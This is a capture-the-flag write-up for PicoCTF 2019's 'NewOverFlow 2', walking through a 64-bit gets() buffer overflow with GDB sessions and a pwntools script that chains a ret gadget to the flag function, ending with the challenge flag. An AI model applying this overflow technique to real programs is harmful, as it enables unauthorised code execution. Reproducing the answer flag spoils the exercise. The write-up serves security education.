PicoCTF19 NewOverFlow 2

Challenge

Okay now lets try mainpulating arguments. program. You can find it in /problems/newoverflow-2_6 on the shell server. Source.

Hints

Arguments aren't stored on the stack anymore ;)

Solution

Let's take a look at the directory and copy the executable over to my home directory so I can debug it with GDB without any restrictions. Let's also make sure there's a flag.txt file with a random flag to tell us when we've solved the problem.

samson@pico-2019-shell1:/problems/newoverflow-2_6$ ls -al
total 96
drwxr-xr-x   2 root       root             4096 Sep 28 22:03 .
drwxr-x--x 684 root       root            69632 Oct 10 18:02 ..
-r--r-----   1 hacksports newoverflow-2_6    38 Sep 28 22:03 flag.txt
-rwxr-sr-x   1 hacksports newoverflow-2_6  8880 Sep 28 22:03 vuln
-rw-rw-r--   1 hacksports hacksports       1344 Sep 28 22:03 vuln.c
samson@pico-2019-shell1:/problems/newoverflow-2_6$ cp vuln ~ && pushd .
/problems/newoverflow-2_6 /problems/newoverflow-2_6

The code for this one is a bit longer.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdbool.h>

#define BUFFSIZE 64
#define FLAGSIZE 64

bool win1 = false;
bool win2 = false;

void win_fn1(unsigned int arg_check) {
  if (arg_check == 0xDEADBEEF) {
    win1 = true;
  }
}

void win_fn2(unsigned int arg_check1, unsigned int arg_check2, unsigned int arg_check3) {
  if (win1 && arg_check1 == 0xBAADCAFE && arg_check2 == 0xCAFEBABE && arg_check3 == 0xABADBABE) {
    win2 = true;
  }
}

void win_fn() {
  char flag[48];
  FILE *file;
  file = fopen("flag.txt", "r");
  if (file == NULL) {
    printf("'flag.txt' missing in the current directory!\n");
    exit(0);
  }
  fgets(flag, sizeof(flag), file);
  if (win1 && win2) {
    printf("%s", flag);
    return;
  }
  else {
    printf("Nope, not quite...\n");
  }
}

void flag() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("'flag.txt' missing in the current directory!\n");
    exit(0);
  }
  fgets(buf,FLAGSIZE,f);
  printf(buf);
}

void vuln(){
  char buf[BUFFSIZE];
  gets(buf);
}

int main(int argc, char **argv){
  setvbuf(stdout, NULL, _IONBF, 0);
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
  puts("Welcome to 64-bit. Can you match these numbers?");
  vuln();
  return 0;
}

Seems like the usual PicoCTF Overflow problems that we are used to. Pass in some input into a buffer and the program exits.

This time however there are three functions, win_fn1(), win_fn2(), and win_fn().

If we were to follow the execution of the program, we need to pass in 0xDEADBEEF for win_fn1() and 0xBAADCAFE or 0xCAFEBABE or 0xABADBABE to win_fn2().

win_fn() seems to print the flag if the arguments are correct and we'd need to somehow provide the arguments in the input buffer. But I'm not sure why that's necessary if we could just jump to flag.

samson@pico-2019-shell1:/problems/newoverflow-2_6$ gdb ./vuln
... <redacted>
(gdb) r < <(python -c 'print("A"*64+"B"*4+"C"*4+"D"*4+"E"*4+"F"*4+"G"*4+"H"*4+"I"*4)')
Starting program: /problems/newoverflow-2_6/vuln < <(python -c 'print("A"*64+"B"*4+"C"*4+"D"*4+"E"*4+"F"*4+"G"*4+"H"*4+"I"*4)')
Welcome to 64-bit. Can you match these numbers?

Program received signal SIGSEGV, Segmentation fault.
0x00000000004008cd in vuln ()
(gdb) x/i $pc
=> 0x4008cd <vuln+27>:  retq   
(gdb) disas flag
Dump of assembler code for function flag:
   0x000000000040084d <+0>:     push   %rbp
   0x000000000040084e <+1>:     mov    %rsp,%rbp
   0x0000000000400851 <+4>:     sub    $0x50,%rsp
   0x0000000000400855 <+8>:     lea    0x16c(%rip),%rsi        # 0x4009c8
   0x000000000040085c <+15>:    lea    0x167(%rip),%rdi        # 0x4009ca
   0x0000000000400863 <+22>:    callq  0x400660 <fopen@plt>
   0x0000000000400868 <+27>:    mov    %rax,-0x8(%rbp)
   0x000000000040086c <+31>:    cmpq   $0x0,-0x8(%rbp)
   0x0000000000400871 <+36>:    jne    0x400889 <flag+60>
   0x0000000000400873 <+38>:    lea    0x15e(%rip),%rdi        # 0x4009d8
   0x000000000040087a <+45>:    callq  0x4005f0 <puts@plt>
   0x000000000040087f <+50>:    mov    $0x0,%edi
   0x0000000000400884 <+55>:    callq  0x400670 <exit@plt>
   0x0000000000400889 <+60>:    mov    -0x8(%rbp),%rdx
   0x000000000040088d <+64>:    lea    -0x50(%rbp),%rax
   0x0000000000400891 <+68>:    mov    $0x40,%esi
   0x0000000000400896 <+73>:    mov    %rax,%rdi
   0x0000000000400899 <+76>:    callq  0x400620 <fgets@plt>
   0x000000000040089e <+81>:    lea    -0x50(%rbp),%rax
   0x00000000004008a2 <+85>:    mov    %rax,%rdi
   0x00000000004008a5 <+88>:    mov    $0x0,%eax
   0x00000000004008aa <+93>:    callq  0x400610 <printf@plt>
   0x00000000004008af <+98>:    nop
   0x00000000004008b0 <+99>:    leaveq 
   0x00000000004008b1 <+100>:   retq   
End of assembler dump.
(gdb) info frame
Stack level 0, frame at 0x7fff306a9468:
 rip = 0x4008cd in vuln; saved rip = 0x4545454544444444
 called by frame at 0x7fff306a9478
 Arglist at 0x4343434342424242, args: 
 Locals at 0x4343434342424242, Previous frame's sp is 0x7fff306a9470
 Saved registers:
  rip at 0x7fff306a9468
(gdb) x/10x $sp
0x7fff306a9468: 0x44444444      0x45454545      0x46464646      0x47474747
0x7fff306a9478: 0x48484848      0x49494949      0x306a9500      0x00007fff
0x7fff306a9488: 0x00000000      0x000077b7
(gdb) x/g $sp
0x7fff306a9468: 0x4545454544444444

Seems like the return address is stored at the DDDDEEEE

This is really similar to the NewOverFlow-1 at this point, let's just reuse the code with a few tweaks. But first let's copy it to our home directory in case of any alignment issues.

samson@pico-2019-shell1:/problems/newoverflow-2_6$ pushd . && cp vuln ~ && cd ~ && ls -al && cat flag.txt
/problems/newoverflow-2_6 /problems/newoverflow-2_6
total 1164
drwxrwx--T     5 root   samson   4096 Jan 14 03:22 .
drwxr-xr-x 28449 root   root   737280 Jan 14 03:00 ..
-rw-rw----     1 root   samson  13000 Jan 14 03:21 .bash_history
-rw-r--r--     1 samson samson    220 Apr  4  2018 .bash_logout
-rwxr-xr-x     1 root   samson   3689 Dec 27 01:44 .bashrc
drwx------     2 samson samson   4096 Dec 27 01:45 .cache
drwxr-x---     3 samson samson   4096 Dec 28 21:36 .local
-rwxr-xr-x     1 root   samson    807 Apr  4  2018 .profile
drwxr-x---     3 samson samson   4096 Dec 28 22:22 .pwntools-cache
-rw-------     1 samson samson   1428 Jan  6 06:41 .viminfo
-rw-------     1 samson samson 385024 Jan  9 05:21 core
-rw-r-----     1 samson samson     28 Jan  9 05:20 flag.txt
-rwxr-x---     1 samson samson   8880 Jan 14 03:22 vuln
SAMCTF{NOT_THE_ACTUAL_FLAG}

Let's use the address of the flag again.

samson@pico-2019-shell1:~$ gdb ./vuln 
... <redacted>
(gdb) r < <(python -c "print('A'*72+'\x4D\x08\x40'+'\x00'*5)")
Starting program: /home/samson/vuln < <(python -c "print('A'*72+'\x4D\x08\x40'+'\x00'*5)")
Welcome to 64-bit. Can you match these numbers?

Program received signal SIGSEGV, Segmentation fault.
buffered_vfprintf (s=s@entry=0x7ffff7dd0760 <_IO_2_1_stdout_>, format=format@entry=0x7fffffffe418 "SAMCTF{NOT_THE_ACTUAL_FLAG}\n", args=args@entry=0x7fffffffe338) at vfprintf.c:2314
2314    vfprintf.c: No such file or directory.

Damn, it's an alignment error, but unlike NewOverflow-1, we can't just increment the adddress by one or a few to be divisble by 16.

What to do...

(gdb) r < <(python -c 'print("A"*64+"B"*4+"C"*4+"D"*4+"E"*4+"F"*4+"G"*4+"H"*4+"I"*4)')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/samson/vuln < <(python -c 'print("A"*64+"B"*4+"C"*4+"D"*4+"E"*4+"F"*4+"G"*4+"H"*4+"I"*4)')
Welcome to 64-bit. Can you match these numbers?

Program received signal SIGSEGV, Segmentation fault.
0x00000000004008cd in vuln ()
(gdb) x/i $pc
=> 0x4008cd <vuln+27>:  retq   
(gdb) display/i $pc
1: x/i $pc
=> 0x4008cd <vuln+27>:  retq   
(gdb) b *flag+27


(gdb) r < <(python -c 'print("A"*64+"B"*4+"C"*4+"D"*4+"E"*4+"F"*4+"G"*4+"H"*4+"I"*4)')
Starting program: /home/samson/vuln < <(python -c 'print("A"*64+"B"*4+"C"*4+"D"*4+"E"*4+"F"*4+"G"*4+"H"*4+"I"*4)')
Welcome to 64-bit. Can you match these numbers?

Program received signal SIGSEGV, Segmentation fault.
0x00000000004008cd in vuln ()
1: x/i $pc
=> 0x4008cd <vuln+27>:  retq   
(gdb) f
#0  0x00000000004008cd in vuln ()
(gdb) bt
#0  0x00000000004008cd in vuln ()
#1  0x4545454544444444 in ?? ()
#2  0x4747474746464646 in ?? ()
#3  0x4949494948484848 in ?? ()
#4  0x00007fffffffe500 in ?? ()
#5  0x000077b700000000 in ?? ()
#6  0x0000000000400940 in ?? ()
#7  0x00007ffff7a05b97 in __libc_start_main (main=0x4008ce <main>, argc=1, argv=0x7fffffffe578, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe568) at ../csu/libc-start.c:310
#8  0x00000000004006aa in _start ()
DISCLAIMER: I got a hint from my fellow teammates at Maple Bacon that this probably means we want to use [ROP Techniques](https://en.wikipedia.org/wiki/Return-oriented_programming)

What if we entered a valid address for the DDDDEEEE, and the address of the flag() function for FFFFGGGG. A return would probably be a good choice as it'll just jump to the next address.

(gdb) r < <(python -c 'print("A"*64)')
Starting program: /home/samson/vuln < <(python -c 'print("A"*64)')
Welcome to 64-bit. Can you match these numbers?

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe460 in ?? ()
1: x/i $pc
=> 0x7fffffffe460:      add    %ah,%ah
(gdb) info frame
Stack level 0, frame at 0x7fffffffe418:
 rip = 0x7fffffffe460; saved rip = 0x400680
 called by frame at 0x7fffffffe420
 Arglist at 0x7fffffffe408, args: 
 Locals at 0x7fffffffe408, Previous frame's sp is 0x7fffffffe418
 Saved registers:
  rip at 0x7fffffffe410

The saved rip is at 0x400680. This isn't divisible by 16 either. Okay. I give up. Let's use pwntools.

exploit.py

#!/usr/bin/env python
from __future__ import print_function
from pwn import *

p = process('./vuln')
binary_instructions = ELF('./vuln')
ret = binary_instructions.search(asm('ret')).next()
print(p.recvuntil('Welcome to 64-bit. Can you match these numbers?'))
p.sendline('A'*72+p64(ret)+ p64(binary_instructions.symbols['flag']))
print(p.recvall())
samson@pico-2019-shell1:~$ python exploit.py 
[*] Checking for new versions of pwntools
    To disable this functionality, set the contents of /home/samson/.pwntools-cache/update to 'never'.
[*] A newer version of pwntools is available on pypi (3.12.2 --> 4.0.0).
    Update with: $ pip install -U pwntools
[+] Starting local process './vuln': pid 2361969
[*] '/home/samson/vuln'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
Welcome to 64-bit. Can you match these numbers?
[+] Receiving all data: Done (29B)
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 2361969)

SAMCTF{NOT_THE_ACTUAL_FLAG}

It works, let's modify the program to run against the challenge directory. p = process('./vuln', cwd='/problems/newoverflow-2_6')

samson@pico-2019-shell1:~$ python exploit.py 
[+] Starting local process './vuln': pid 2362033
[*] '/home/samson/vuln'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
Welcome to 64-bit. Can you match these numbers?
[+] Receiving all data: Done (39B)
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 2362033)

picoCTF{r0p_1t_d0nT_st0p_1t_535c741c}

Flag

picoCTF{r0p_1t_d0nT_st0p_1t_535c741c}